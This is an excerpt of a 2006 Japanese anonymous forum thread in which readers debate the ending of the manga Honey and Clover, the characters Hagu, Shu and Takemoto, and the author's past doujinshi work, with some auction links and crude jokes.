232 :花と名無しさん:2006/07/31(月) 16:45:18 ID:???0
山田はいつ頃どういう風に真山をあそこまで好きになっていったのですか

233 :花と名無しさん:2006/07/31(月) 16:46:10 ID:???O
ウミノにきけ

234 :花と名無しさん:2006/07/31(月) 16:52:38 ID:???0
真山→理花も最初は一目惚れでしょ?
ちょっとした矛盾が発生するのでアニメじゃスルーされていたけど、
初めて真山が原田デザインに行った時の回想話があったよ。

235 :花と名無しさん:2006/07/31(月) 17:03:01 ID:???0
インプリンティングって、純粋に「本能」で生きている動物にのみ有効な
ものだと思ってた。生後何ヶ月かの嬰児とか幼児だったらわかるけど、
普通の環境で育った成人した人間に当てはめるのは無理がないか?
つーか、ハチクロに掘り下げや解釈は無意味な気がしてきてしまったヨ…。
そーゆー穴が有りすぎるんだもん。キリがないよね。

236 :花と名無しさん:2006/07/31(月) 17:05:03 ID:???0
>>235
十分あるでしょ。
同じ原作モノでドラマと映画があって
先に見た方に思い入れを持つのなんてまさにそう。


237 :花と名無しさん:2006/07/31(月) 17:06:12 ID:???0
何事も初体験ってあるじゃまいか。

238 :花と名無しさん:2006/07/31(月) 17:38:51 ID:???0
一応この漫画誰が主役だったのか分かんなくなったけど
竹本が主役だったんだねw
こんなんなっとく出来るかw

239 :花と名無しさん:2006/07/31(月) 17:44:02 ID:???P
今更ですがネタばれ含む感想↓


問題の、単行本9巻未収録の回から読んでなくて、
ちょうどその発売前後にこのスレに来て阿鼻叫喚を目の当たりにした者です
確かにここで見てるとめちゃくちゃキャラ改変、ストーリー穴だらけみたいだけど、
未だに本物を通してみてないからなんだか悪い夢を見てるよう…





240 :花と名無しさん:2006/07/31(月) 17:45:18 ID:???P
>>239
ごめんなさい最初の1行は消し忘れてました…orz
脳内削除しといて下さい。

241 :花と名無しさん:2006/07/31(月) 18:26:07 ID:???O
スピンオフって何回くらいやんのかね?
10巻埋めるには何回必要??

242 :花と名無しさん:2006/07/31(月) 18:27:11 ID:???0
>>241
2回と内輪ネタで埋まるかな。


243 :花と名無しさん:2006/07/31(月) 18:45:52 ID:???O
マンセーでもなく、叩き込みの意見でもない、そこそこ正当?な評価が知りたいけど人それぞれだよね?

244 :花と名無しさん:2006/07/31(月) 18:51:39 ID:???0
人それぞれじゃない?
ほのぼのしてたから最後に不幸ラッシュがくると思わなかったとか
たけのこがフラレ確定みじめでもいいと頑張ってたのに
いきなり毒吐き出してびっくりしたとか、
修ちゃんってはぐ好きだったんだ?と驚いてた子はいたけど…
でも最後はよかったねって言ってた
普通の読者はそんな感じだった

245 :花と名無しさん:2006/07/31(月) 19:15:04 ID:???0
ハチクロは一条ゆ○りに潰されたの?って聞かれたけどまさか違うよねえ・・・

246 :花と名無しさん:2006/07/31(月) 19:17:52 ID:???O
>>243
お前に取っての正当な評価って何なんだ?

247 :花と名無しさん:2006/07/31(月) 19:20:29 ID:???0
今年いっぱいは野宮ストーリーという噂を聞きました。


248 :花と名無しさん:2006/07/31(月) 19:23:58 ID:???0
野宮とあゆのその後話を読みたい。

249 :花と名無しさん:2006/07/31(月) 19:34:05 ID:???0
ちょ、はぐは修とくっついておわんのかよ。
雑誌読んでないけど、修ははぐに恋愛感情を持ってたってことになってるの??

あと、最終話は9月号掲載だよね?
これだけでもかっとこうかなぁ。

250 :花と名無しさん:2006/07/31(月) 19:50:29 ID:???O
恋愛感情を超越してるぞ
究極の無償の愛
親がそういう気持ちになるのはあたりまえだけど
修ちゃんただのオヤジだから正直キモかった
私はね

251 :花と名無しさん:2006/07/31(月) 19:53:14 ID:???0
>>248
それオンリーだともろ少女漫画になっちゃいそうでなんかイヤだ。

>>250
てか何歳差??まぁ年齢なぞ関係ないと仰りたいのでしょうけど。

252 :花と名無しさん:2006/07/31(月) 19:54:31 ID:???0
>>251
ハチクロは少女漫画じゃないのかよw

253 :花と名無しさん:2006/07/31(月) 20:00:08 ID:???O
はぐ臭の展開はココで知って実際に読んでないから何とも言えないけど、別冊のインタビューであゆは幸せになります!って断言してるのはマズイと思った。
漫画外でいうなら具体的に言うのは×じゃない?


254 :花と名無しさん:2006/07/31(月) 20:06:41 ID:???0
>>253
まぁ、ウミノだから

255 :花と名無しさん:2006/07/31(月) 20:07:53 ID:???0
>>252
そりゃそうだけどさ
真面目なツっ込みどうもー。


256 :花と名無しさん:2006/07/31(月) 20:12:15 ID:???O
>>254
えええ…7の人は全然洩らさないし、なんだかミステリーで疑われてる人を、この人は犯人じゃないよと言ったくらいダメだとオモ

257 :花と名無しさん:2006/07/31(月) 20:17:21 ID:???O
>>246
漫画スクールの採点付き批評みたいな形式かな。絵に大変魅力があって、見せ方も安定している。
個々のエピソードはよいがつながりが説明不足なところ有り。雰囲気で流してしまうところも。


…こういうの。

258 :花と名無しさん:2006/07/31(月) 20:43:11 ID:KTBQuTQf0
最後までキャラの顔はちゃんと変わらないまま描けてた

259 :花と名無しさん:2006/07/31(月) 20:51:37 ID:???0
作者にはその場の雰囲気と思いつきで暴走するクセがあり、
確かにその場だけでは読者にとっても面白い事が多いが、
後々積もり積もった伏線や設定が収拾できなくなるパターンに嵌る。
特に思い入れの強いキャラに関してはこの傾向が強い。良くも悪くも同人出身作家の極端な例。
だが、キャラ個体に気に入った者が見つかれば、その作者の悪乗りに便乗して楽しむという荒技もできる。
頭から最後まで間をおかずに読めば細かい齟齬や矛盾等は気にならないので、
単行本全てを一気に読破するのがお勧めである。

260 :花と名無しさん:2006/07/31(月) 21:07:56 ID:???O
>>258
んなわけねーよ

261 :花と名無しさん:2006/07/31(月) 21:24:52 ID:???O
「修がはぐを女として好きで恋愛感情を抱いていた…」
ってことはウミノさんがどうしても伝えたかったこと?
それによって読者は何を思えばいいの?
修が青春スーツ着たのはいいけど
はぐに直接伝えずに周囲のみんなにぶっちゃけてどうすんの?
はぐは修の恋愛感情に気付いてるっていってたけど
それについてはぐはノーコメント?なんで最後まで触れないの?
わけわからん

262 :花と名無しさん:2006/07/31(月) 21:40:42 ID:???0
>>259

すげー的確。面白い

263 :花と名無しさん:2006/07/31(月) 21:48:15 ID:g7Li1YsmO
今ならいえる。


最初キャラの見分けつかなくてつまんなくて売った。
アニメが面白かったので続き併せて買い戻した

264 :花と名無しさん:2006/07/31(月) 22:24:23 ID:???0
森田って義経じゃんね

265 :花と名無しさん:2006/07/31(月) 22:33:40 ID:???0
>>261
はぐは修の恋愛感情に気づいてるからこそ
「お返ししなきゃ(ご奉仕しなきゃ)」と思いつめてるのですよ。
本当はイヤなんでしょうね。かわいそうに。

266 :花と名無しさん:2006/07/31(月) 22:33:46 ID:???0
>良くも悪くも同人出身作家の極端な例。

これって的確か?
腐女子って、すぐ「同人出身」って点に食いつくけど、
まったく関係ないんじゃないの。


267 :花と名無しさん:2006/07/31(月) 22:34:38 ID:???0
愛とか友情とか定義がないのはわかるけど
ウミノさんの考えてるものと自分とではあまりにかけ離れていて
最後の最後で理解できなかった。
特に家族愛と男女の恋愛。

268 :花と名無しさん:2006/07/31(月) 22:35:04 ID:???0
腐男子=キモヲタうぜぇ。

269 :花と名無しさん:2006/07/31(月) 22:37:33 ID:???0
>>267
まぁ…「ハチクロワールド」ですから…。
しょうがないんですよ…(遠い目)。

多分、そこ、つっこんじゃいけないんですよ…。

リカと原田と臭の男2人女1人の同棲生活も
竹本に「泊まってって?」と無邪気に言った
幼女のような成人はぐみも
桜の下のキスで照れて逃げ出す純情森田(20代後半)も
つっこんじゃいけないんですよ…。

270 :花と名無しさん:2006/07/31(月) 22:40:21 ID:???0
少年漫画板から来たけど
少女漫画板は腐臭くてたまらんとわざわざ主張してる人は
少年漫画板の恋愛漫画、ラブコメ漫画のスレの臭さは
こんなもんじゃないことを知らないんだろうか。
いちご100%とか涼風とかスクールランブルとか
男ヲタの阿鼻叫喚ですごかったぞ…。

それにしても少女漫画板に来る男は
なんで自分が男なことをわざわざ主張するんだろ。
少年漫画板で女っぽい書きこみがあると
総叩きするくせに。

271 :花と名無しさん:2006/07/31(月) 22:44:32 ID:???0
>いちご100%とか涼風とかスクールランブルとか
そんなんはもう人間の読み物じゃないだろ

それに腐作家云々つってるのは男じゃなくて
腐漫画を読みなれた腐自身だろう
同人ってのは雰囲気漫画が多いから

272 :花と名無しさん:2006/07/31(月) 22:50:31 ID:???O
>>266
同人一時期やってても元々オリジナルから描きだして、ちょっと手を出しただけって人も居るから同人出身なんて本当はくくれないんだけどね。
羽海野さんはどうなのか知らないが。

273 :花と名無しさん:2006/07/31(月) 22:55:46 ID:???0
お返ししなきゃ、っていうのは気持ちをあげられないからこそ何か別の形で返さなきゃって
事なんだろうなとか思ったな。

274 :花と名無しさん:2006/07/31(月) 22:56:35 ID:???0
>>272
羽海野さんは90年代に同人どっぷりでした。
ソースどぞー。

http://search4.auctions.yahoo.co.jp/jp/search/auc?p=%B1%A9%B3%A4%CC%EE%A5%C1%A5%AB&auccat=2084005146&alocale=0jp&acc=jp
http://www.aucfan.com/search1?q=%a5%b9%a5%e9%a5%e0%a5%c0%a5%f3%a5%af%a1%a1%b1%a9%b3%a4%cc%ee&t=-1


オークションで売りに出されるハチクロ1〜8巻セット。
1〜9巻セットもある。
http://search4.auctions.yahoo.co.jp/jp/search/auc?p=%A5%CF%A5%C1%A5%DF%A5%C4%A4%C8%A5%AF%A5%ED%A1%BC%A5%D0%A1%BC&auccat=2084057159&alocale=0jp&acc=jp

275 :花と名無しさん:2006/07/31(月) 22:59:40 ID:???0
>>273ならまだいいけど、>>265の通りだとはぐキモス。

ところで、自分はもともとはぐみが嫌いだったし
はぐみと臭ってある意味お似合いのカップルじゃないかとも思う。
共依存カップルで。

森田×はぐ派の人って、森田が大好きな人が多いみたいだけど
はぐみも好きなの? はぐみなんか好きになれる?
森田の相手がはぐみでいいの?

276 :花と名無しさん:2006/07/31(月) 23:02:55 ID:???0
>>265
自分もそうかと思ったw
たけのこがそれは違うよって言ったことで
肩の荷が下りて嬉し泣きだと解釈したよ
よって修はぐEDではないと脳内決定しました

277 :花と名無しさん:2006/07/31(月) 23:03:22 ID:???0
逆にウミノが同人出身だとか腐女子だとか言う舞台裏の数々を知っていて
色々不満を漏らしている人のほうがこの作品に対する愛があるように見えるんだが。
ダメな子に対して不満を言いつつ付き合ってるような。

本当に駄作だと思ってコミックス全部を処分した人間なら、黙ってそのまま作家のことも見限るし
掲載誌だって他の作品だってもう2度と手を付けようとしないだろうに。
ましてこのスレなんて覗く気すらなくなるし、作品について語ることもないと思う。

>>271
いちごは凄まじいな、あそこまで同じ作品のファン同士で仲が悪いのは珍しいよ。
男の粘着だって怖い奴は本当に怖いんだという事を改めて思い知った。

278 :花と名無しさん:2006/07/31(月) 23:11:10 ID:???O
>>266
お前が知らんだけだよ。
すぐ腐女子の私怨に結び付けるな。

279 :花と名無しさん:2006/07/31(月) 23:11:57 ID:???0
>>277
>逆にウミノが同人出身だとか腐女子だとか言う舞台裏の数々を
>知っていて 色々不満を漏らしている人のほうが
>この作品に対する愛があるように見えるんだが。

それも一方的な見方。

舞台裏を知っていなくても作品に愛情をもてるし、
知っているヤツよりも深く作品世界を理解することも可能。
奇妙な特権意識を持っている腐が多いなあ。

280 :花と名無しさん:2006/07/31(月) 23:14:21 ID:???0
いちご100%は、最終回近くで
主人公男が結ばれる女キャラがひっくり返ったからな。
いちごの場合は、作者の萌えのせいでひっくり返ったというより
読者人気が高いほうとくっつけるためにひっくり返したらしい。
最初に主人公男とくっつく予定だった女キャラは
おとなしい子なので読者人気がやや低かった。

281 :花と名無しさん:2006/07/31(月) 23:17:32 ID:???0
>>275
いいよ

282 :花と名無しさん:2006/07/31(月) 23:17:37 ID:???O
>>276
まとめると
竹本現人ネ申の漫画だよなハチクロは
神様じゃ、ありゃ片思いの神様じゃ
逆に最終回直前の修は塩まきたくなるなるくらい
悪魔にみえたわ
弱みにつけこんで欲情なんて最低!w
最終回、何の説明もなく更正というかスルーでよかったよかった。

283 :花と名無しさん:2006/07/31(月) 23:18:51 ID:???0
>>279
同人時代のウミノさんに詳しい人の書き込みにはよく
「ハチクロってオタク臭がぬけきらない」
「ハチクロのキャラのモデルはスラダンのキャラ」
のようなのがあるけど
「私は同人時代のウミノさんを全然知らないから
 ハチクロに『オタク』だとか『スラダン』だとかって
 全然感じないんだけど…」
とよく思ってたから、あなたの意見には同意だけど
最後の一行は不要だと思う。

あなたと同じように返すなら
「奇妙な男尊女卑意識をもってる男厨が多いなぁ。」

284 :花と名無しさん:2006/07/31(月) 23:21:37 ID:???0
古本屋で1〜7巻だけを買ったよ。
1400円だった。(まだ1冊100円の棚には置かれていなかった)

285 :279:2006/07/31(月) 23:22:05 ID:???0
>>283
なんかストレートに反応してくれているなあ。
匿名掲示板なんだから、煽り文はテキトーに割り引いて読んでくれよ。

286 :花と名無しさん:2006/07/31(月) 23:24:09 ID:???0
>>279
だから、普通の感覚で見たら「ワケワカンネ」「ハァ?」な部分が出てきたら速攻で終了モードに入るけど
ここで色々愚痴ってるうちはまだ作品に対する気持ちが残ってるってこった。

雰囲気というか上澄みだけ汲み取ればどの部分だって面白がれるけど
そんなもんは二流三流の作家相手だからこそまだ可能なのであって
ハチクロのように一流レベルの売れ方をした作品に対しての評価が厳しいのは当たり前じゃね?

一流扱いを求めているのに、至らない部分は同人並みに生暖かく見守ってくれと言うのは虫が良すぎ。

287 :花と名無しさん:2006/07/31(月) 23:24:09 ID:???0
>>275
私も同じ気持ち。
もともと臭がはぐの甘ったれた依存体質を増長させたわけだし
面倒見るのが当たり前だと思ってた。
森田も竹本もはぐから開放された方がいいよ。

288 :花と名無しさん:2006/07/31(月) 23:26:56 ID:???0
突然の連載終了。
そして、同時に浮上した宗教団体と少女漫画家の関係。


もしかしたら広告塔だったのは、

 羽 海 野 チ カ  だった

と逝ってみるテスト。

289 :花と名無しさん:2006/07/31(月) 23:27:10 ID:???0
↓この人スゴイね…。
 相当ウミノヲタだったのに、見限ったんだ。

ハチクロ1〜9巻
ハチクロキューティコミックス版
カルタ付き限定版、ファンブック
映画版書籍
ダヴィンチのインタビュー、
ハチクロが掲載されてるコーラスとヤングユー(付録も含む)
等を一気に放出してる…

ttp://page11.auctions.yahoo.co.jp/jp/auction/n43422806
ttp://page13.auctions.yahoo.co.jp/jp/auction/r28539264

売値がやたらと高いから( ´,_ゝ`)フーンだけど。

290 :花と名無しさん:2006/07/31(月) 23:27:56 ID:???0
>>285
煽りイラネ

291 :花と名無しさん:2006/07/31(月) 23:28:17 ID:???0
返すの返さないのって
今までだって手取り足取りお世話になってて、何を今更。
結局気持ちはどうあれ、はぐ臭は、これまでもこれからも行動的には何も変わりがない。
恋愛からめばいろいろ増えるけど。


292 :花と名無しさん:2006/07/31(月) 23:30:29 ID:???0
はぐの「お返ししなきゃ」発言は手を怪我したことで
「作品を作りたい、自分には一番大事」→作品を生むのには雨である修が必要だから
「(自分が作品を造り続けるために)修ちゃんの人生下さい」

修の人生を要求したんだ代将に自分は山田への恋心は諦めて封印しなきゃ→「お返ししなきゃ」
でタケノコの「その必要なし」発言で解放されて山田への恋心を持ち続けて「嬉しそうにWEBカメラを見る」
その嬉しそうなはぐを嬉しそうに見守る修…いずれはぐは修の手から離れるだろう…って解釈したけどな。

293 :花と名無しさん:2006/07/31(月) 23:31:16 ID:???0
ウミノクマは
安野モヨコの自画像(?)のロンパースと同じくらい
ウザイ。

294 :花と名無しさん:2006/07/31(月) 23:31:51 ID:???O
あれ?今週のBLEACHに山田がいるつうかハチクロになってる

295 :花と名無しさん:2006/07/31(月) 23:31:57 ID:???0
>>292
山田への恋心?
ハチクロって百合漫画だったのか???

296 :花と名無しさん:2006/07/31(月) 23:32:07 ID:???O
映画トップ10圏外オメ

297 :花と名無しさん:2006/07/31(月) 23:32:50 ID:???0
>>288
某御大に潰されたってほうが
まだ真実味があるぞ

298 :花と名無しさん:2006/07/31(月) 23:35:42 ID:???O
>>261
それ、おかしいよなあ。
はぐが好きならはぐが認めてくれればいいはずなのに
はぐが逃げられないように周り固めてくのは卑怯。
大人のすることかと言うか、大人にしかできないやらしさだよな。
自転車でお姫様の鎖(腐り)を外した竹本は真の男前だな。ナイシュー。

299 :花と名無しさん:2006/07/31(月) 23:39:26 ID:???0
あのシーンはある意味竹本が王子様に見えたな
そこでの竹本はかつてのいい奴時代と同じぐらいに輝いていたよ

森田と比べると没落貴族の王子様のようなのが悲しいけど( ノ∀`)

300 :花と名無しさん:2006/07/31(月) 23:39:55 ID:???0
どうフォローしても臭ちゃんが株を下げたのは変わらない。
ミクシィでハチクロマンセーしてる人は
臭ちゃんに疑問を全くもってないのかな?
それとも、臭ちゃんのことはスルーして
一応は美しくまとめた最終回のみをマンセーしてるのかな?

実は自分はミクシィは一応会員になってるけど
あそこは見るのがめんどくさくて、あんまり覗いてないんだわ。

301 :花と名無しさん:2006/07/31(月) 23:42:03 ID:???0
ミクシで批判なんか出来るかボケ

302 :花と名無しさん:2006/07/31(月) 23:44:10 ID:???0
mixiはコミュだと下手な発言は出来ないから発言しないけど
日記では(ハチクロに限らず)結構ぶっちゃけて批判することもある。

それをやるとマイミクが皆引くけどな!

303 :花と名無しさん:2006/07/31(月) 23:44:18 ID:???O
未串は馴れ合い広場だよ

304 :花と名無しさん:2006/07/31(月) 23:48:40 ID:???0
はぐって、本当に女に嫌われるキャラなんだな。

305 :花と名無しさん:2006/07/31(月) 23:53:37 ID:???O
>>300
修の暗部はみんな暗黙のスルーなんじゃない?
せっかく最終回見事に消えてた、かつ竹本が消してくれたわけだから
もう思いだしたくないわ。
萌えたい人は萌えてもいいと思うけど。

306 :花と名無しさん:2006/07/31(月) 23:56:13 ID:???O
別にいいんじゃないの?
感想は人それぞれなんだし ´ー`)

307 :花と名無しさん:2006/07/31(月) 23:57:46 ID:???O
>>265つまりはぐは修の恋愛感情を知った上で人生くれといったんですね…(((( ;゚Д゚)))ガクガクブルブル
Sexしなくていい愛人みたいなもんか…
パトロン&スポンサーだね
花本、金はあんま持ってないけど精神面では全てを支えてくれるしね
花本に全てを支えてもらいながら森田と作品見せあいっこするのが
はぐにとっての幸せってことか…
そして花本は自分と一緒にいてくれるならそれでもいいって訳か…

修は青春スーツどころか男として最悪の人生の選択をしただけなんじゃあ…。
情けない哀れな人生だな(´・ω・`)

308 :花と名無しさん:2006/07/31(月) 23:58:59 ID:???0
散々ガイシュツだったらごめん。
ウミノさんの同人誌って何冊くらい出てるの?
以前、古本屋で見かけたんだけど、
ショウケースに入ってるわビックリするような金額だわで
その時は買わなかったんだけど、
これから集めたらどれくらい金がかかるのかな。
噂に聞くような熱心なファンがいたなら読んでみたい。

309 :花と名無しさん:2006/07/31(月) 23:59:55 ID:???O
>>296
映画ヒットしてないの?
みにいこうと思ってたんだけど、ここ最近の悪夢のような展開で
すっかり行く気なくしてたわ

310 :花と名無しさん:2006/08/01(火) 00:01:58 ID:???O
>>300
最終回号泣!がほとんど、はぐ週は自然でした☆って人ばかり。たまに唐突すぎてとまどう人が稀にいた。

311 :花と名無しさん:2006/08/01(火) 00:01:59 ID:???0
>>309
まあ人が群がるような映画じゃないわな

312 :花と名無しさん:2006/08/01(火) 00:03:35 ID:???O
>>304
はぐの同性から見て魅力的な処ってどこ?
いわば人間的魅力?

313 :花と名無しさん:2006/08/01(火) 00:06:10 ID:???O
考えたらはぐに友達としての魅力ってないよね?
はぐのいいところってなんだろう?

314 :花と名無しさん:2006/08/01(火) 00:07:25 ID:???0
>>308
過去にそのことをこのスレで質問したけど、誰も教えてくれなかった。
かといって、同人板や801板は、ここ以上に
「部外者は来るな」が徹底してる板だから
よけい質問できないし。

ウミノさんが同人歴を隠したがってるように
同人ファン兼ウミノファンの人達も
ウミノさんの同人歴を部外者に教えたがらないみたい。

315 :花と名無しさん:2006/08/01(火) 00:08:17 ID:???O
>>308
よく知らないけどアンソロでも読めるらしいよ。
一回古本屋で、のってるかなーと思ってその手パラリとめくったら
裸で絡みあってる仙道と流川がでてきて
それから怖くて探せない
本能的に、これ以上読むと青春が汚れると思ったw

316 :花と名無しさん:2006/08/01(火) 00:08:37 ID:???0
本たくさん出しすぎてて信者でも把握してないんじゃね?
それにしても最終回の「中身はなんだい?」にはワラタ

317 :花と名無しさん:2006/08/01(火) 00:12:44 ID:???0
>>185
亀レスっす。

そういうのはさー
米の飯食って不味いと洩らし嘆いてる奴に、
自分で米作ってから文句言えつってるようなもんで。

百姓の苦労を知れや馬鹿者が!と言った所で相手は百姓じゃないべ。
米食う人間、んで金落とす消費者。
文句を言わせたくないなら作るな売るなって話だなあ。

318 :花と名無しさん:2006/08/01(火) 00:12:47 ID:???0
私は、1巻の頃からはぐが嫌いだった読者ですが
はぐが成長のきざしを見せた頃…
山田と一緒にクリスマスにバイトをして
風船のディスプレイを作った時や
絵画教室で子供達に絵を教えて頑張ってた頃に
少し、はぐのことを好きになれそうだと思ったことがあります。

ハチクロは、はぐ=主人公が嫌いでも
(竹本が主人公という話もあるが、自分は「竹本=語り手」で
 「はぐ=主人公」だと思っていました。)
他のキャラ達が好きだったり
絵や見せ方がものすごく魅力的だったので読んでたんですが
やっぱり主人公を好きになれたほうが
より深くハチクロを好きになれるので
はぐを好きになれそうになった時に嬉しかった。

今は…やっぱりはぐ嫌い…。

319 :花と名無しさん:2006/08/01(火) 00:13:22 ID:???O
>>316
わしもワロタ。
なんだい?ってなんだい?

320 :花と名無しさん:2006/08/01(火) 00:14:41 ID:???0
>>314-316
そうな感じなんですか…。どうもありがとう。
と、レスを待ってる間に検索してたら
リストを載せてるサイトが見つかりました。
あまりの数の多さに眩暈がした。

とりあえずアンソロから探してみます。

321 :花と名無しさん:2006/08/01(火) 00:14:54 ID:???0
>>314
同人のことなんかはオクとか見てたらどういう本があるとかだいたい分かるんじゃないの?
聞くだけじゃなくて自分でも調べよう。

322 :花と名無しさん:2006/08/01(火) 00:15:38 ID:???O
はぐが1番誰よりも強欲だよね

323 :花と名無しさん:2006/08/01(火) 00:15:53 ID:???0
でもウミノさんのはスラムダンクキャラが裸でウホッなことを
してるような同人誌じゃなくて
ハチクロ1巻の、竹本と森田と真山が仲良くじゃれあってるみたいな
男の友情のほのぼの話なんでしょう?
ウホッはギャグとしてじゃないと読めない自分でも
ホモエロウホなしほのぼの話なら読めると思うんだけど。

324 :花と名無しさん:2006/08/01(火) 00:16:39 ID:???0
>>321
オークションで検索するくらいあなたに指図されなくともやっています

325 :花と名無しさん:2006/08/01(火) 00:18:04 ID:???0
こえーw

326 :花と名無しさん:2006/08/01(火) 00:19:55 ID:???O
>>322
強欲ですが何か?なキャラならまだマシだが、奥ゆかしくして周りにしてもらうタチの悪いタイプだ


327 :花と名無しさん:2006/08/01(火) 00:20:25 ID:???0
はぐ好きだよ
たけのこ視点で読んでたかもしれないけど
山田さんは後半はいただけなかった
ヒロイン二人とも好きな人はいるのか?

328 :花と名無しさん:2006/08/01(火) 00:21:01 ID:???0
>>323
どこかのマイナー雑誌の企画で、ウミノが昔作ったエロ同人誌を
本人に送りつけたという話を聞いたことがある。

329 :花と名無しさん:2006/08/01(火) 00:23:07 ID:???O
どんな展開でも受け入れるのが儲です

330 :花と名無しさん:2006/08/01(火) 00:24:05 ID:???0
信者ではないので受け入れられませんでした!

331 :花と名無しさん:2006/08/01(火) 00:25:01 ID:???0
>>328
サイゾーだね。
過去スレで話題になってた。
その本が唯一、ウミノさんが生まれてはじめて描いた
ホモホモエロエロウホッな同人誌だったという。

男同士の友情みたいな話は大好きだけど
ホモホモエロエロウホッなその本は避けたいので
その本のタイトルが知りたいんだが…。

332 :花と名無しさん:2006/08/01(火) 00:26:58 ID:???0
信者だったけど最後の数話で一気にどうでもよくなってしまった。
泣いてたら森田さんがポカリを差し入れてくれるような山田が好きだった。
今から思えば最初からよく泣くキャラだったのか…


>>328
サイゾーだっけ。
割と最近だよね。このスレでも話題に上った記憶がある。



333 :花と名無しさん :2006/08/01(火) 00:27:08 ID:???0
ナナはハチ(凡人)に感情移入して
ハチクロはたけのこ(凡人)に感情移入して読む漫画なんだよ


334 :花と名無しさん:2006/08/01(火) 00:28:24 ID:???O
ホモホモエロエロうほっワロスww

335 :花と名無しさん:2006/08/01(火) 00:29:37 ID:???0
ウミノタソの描くホモホモエロエロウホッはヌルそう
なんとなく

336 :花と名無しさん:2006/08/01(火) 00:33:35 ID:???0
>>333

もう少し語呂合わせがうまかったら、
座布団一枚か、単行本1〜9巻を差し上げたのに......

337 :花と名無しさん:2006/08/01(火) 00:36:32 ID:???0
>>331
エロはなくても明らかに友情を超えてる話は少なくないよ。
ただ、そういうシーンのみを避けたいというのであれば
下の三冊は避けたほうがいい。
Not nude, but naked、AUTO EROTIC、僕たち男の子
どれもだいぶ初期のもの。
「僕たち男の子」に入ってるショートは
他のと比べてもウホッwwて感じ。


338 :花と名無しさん:2006/08/01(火) 00:36:34 ID:???0
>>335
でも心理描写(黒枠ポエム)はヌチャヌチャと濃そう
なんとなく

同人時代のウミノさんの作風を全く知らないんだが
同人時代も黒ポエムをやってたのかな。
同人時代も作風全く同じ?

339 :花と名無しさん:2006/08/01(火) 00:37:08 ID:???0
ッアー!

340 :花と名無しさん:2006/08/01(火) 00:38:53 ID:???0
7は8に感情移入して
896はたけのこに感情移入して読む漫画なんだよ

341 :花と名無しさん:2006/08/01(火) 00:39:33 ID:???O
この漫画の端々から表面的、偽善的な空気を感じるのは私だけなのか…な

342 :花と名無しさん:2006/08/01(火) 00:39:36 ID:???0
>>337
ありがとう!!!!(・∀・)
オークションであまり高い値段になっていなかったら
それは避けて買ってみるー(・∀・)

ホモホモエロエロウホッは苦手だし
BL漫画本もホモ同人も買ったことないけど
バナナフィッシュとか日出る処の天子みたいな
少女漫画内のホモ描写は大丈夫だったから
多分、エロないんなら大丈夫でしょう。

343 :花と名無しさん:2006/08/01(火) 00:39:54 ID:???0
誰が上手いこ(ry

344 :花と名無しさん:2006/08/01(火) 00:41:35 ID:???O
エロないならなぜ隠す?
そしてはぐの人間的魅力は見つからなかった……

345 :花と名無しさん:2006/08/01(火) 00:42:47 ID:???0
男性読者や、アニメからハチクロのファンになった人は
竹本に感情移入してる人が多かったね。

それにしても竹本、最終回で少しもちなおしたね。
このスレでもちゃんと「たけもと」って呼んであげてる人が
また増えてるし。
一時はみんな
「竹田」「竹下」「竹村」「たけなんとか」「モブ」「空気」「糞」など
ちゃんと呼ばない人のほうが多数派だったwww

346 :花と名無しさん:2006/08/01(火) 00:43:58 ID:???0
>>344
エロあろうとなかろうと、同人というだけで嫌う人も世の中には多いし。
あと、スラムダンクの井上雄彦先生が同人をものすごく嫌ってる人だから
知られたくないというのもあったんじゃないかな。

347 :花と名無しさん:2006/08/01(火) 00:44:21 ID:???0
気持ちいいって       ンギモッチイイッ! (たけのこ)
言ってみろ   ャ-,,,,,,,,,,r‐rL,v--i、      .,,,―――-,、
         │ ._,,、  ゙l|r> <'li:    .,,/"         ″
,,,v-――-。_,r¬'lz''"` `゙''・lll、O.,l    │         
       .'l!,,i´゙゙l,..r‐'''''''" ゙―'∨    ゙l,         「・・・・・」
        .゙l|_,,,,l′      ゙┐    ゙li、       
        ..,l,″│ ,、。   。  ゙l    │゙'i、      
       ,r"li、 :l゙ /|  人 .,l" |    l゙i  'h,: ..___ 
      .,r" ,_|.゙l,,| .j゙l,.|  生  || .|    ゙l,.,,r'゙゙″: : : `
rw---=*_,.,,|^ ,",lf,,,゙li,、   ゚<:|   : _,,ilニ――¬'''''`
―-------゙゙,,,、 l゙.,レ'”=″↑  `゚なeー"″        
        `"'チ,ll_:  .._,,vi、,,,,,r'"            
            : `゚''''ミ,、 /"              
                  ゚k.,ト               
    (森田)          ゙l,"    (真山)

348 :花と名無しさん:2006/08/01(火) 00:45:04 ID:???0
>>345
>それにしても竹本、最終回で少しもちなおしたね。

修はぐを阻止?してくれたしな。


349 :花と名無しさん:2006/08/01(火) 00:46:27 ID:???0
>>342>>331
あなたは、ほんのちょっとのきっかけで
801スキーに転ぶタイプのような気がするよ。。

350 :花と名無しさん:2006/08/01(火) 00:47:48 ID:???O
>>346
まさか日の元に出るとは思わなかったんだろうね

351 :花と名無しさん:2006/08/01(火) 00:48:52 ID:???0
だがペンネームそのままってのが、
すごい冒険してると思う・・・

352 :花と名無しさん:2006/08/01(火) 00:50:00 ID:???0
まさか同じ集英社で仕事する事になるとは思わなかったんだろうよw
キューコミ時代はそんなに伏せてなかったし。

353 :花と名無しさん:2006/08/01(火) 00:50:16 ID:R5CMiZS/O
未串見て自分がおかしいんかとちょっと思った


354 :花と名無しさん:2006/08/01(火) 00:52:42 ID:???0
>>353
ミクシィは馴れ合い広場だから、マンセー以外の書き込みはしにくいんだと
何度いったら…。

臭×はぐに不満を持ってる人は口をつぐんでるよ。
森はぐコミュニティはお通夜みたいだったよ。

355 :花と名無しさん:2006/08/01(火) 00:52:47 ID:???0
たけのこは雑魚キャラから一転、姫をロリコンから救った王子になれたね
助けてくれてありがとうって毒入りサンドを渡される、王道ED

356 :花と名無しさん:2006/08/01(火) 00:57:11 ID:???0
ガラスの仮面のコミックス版は、雑誌掲載版と大きく違うように
(亜弓さんの失明がなかったことになってたり)
ハチクロのコミックス版も、臭の「好きさ!大好きさ!」や
はぐの「臭ちゃんは私のたいせつなひと」ポエムが
なかったことになってないかな。
描きなおしがあるといいんだけど。

でもウミノさんがもうハチクロを描くのに飽きたみたいだし
次回作の将棋漫画で頭がいっぱいだから
描きなおしはないのかも?

357 :花と名無しさん:2006/08/01(火) 00:58:40 ID:???O
>>354
ゴメ、来てすぐ書き込んで読んでなかった
すぐ前に話題でてたんね


358 :花と名無しさん:2006/08/01(火) 00:59:35 ID:???O
>>314
スラダンが中心だけど、
ナルトのカカイルか何かの合同本にがゆんとうみのが執筆してたような
スラダン本は結構あったと思う。あとオリジナルの801本もある

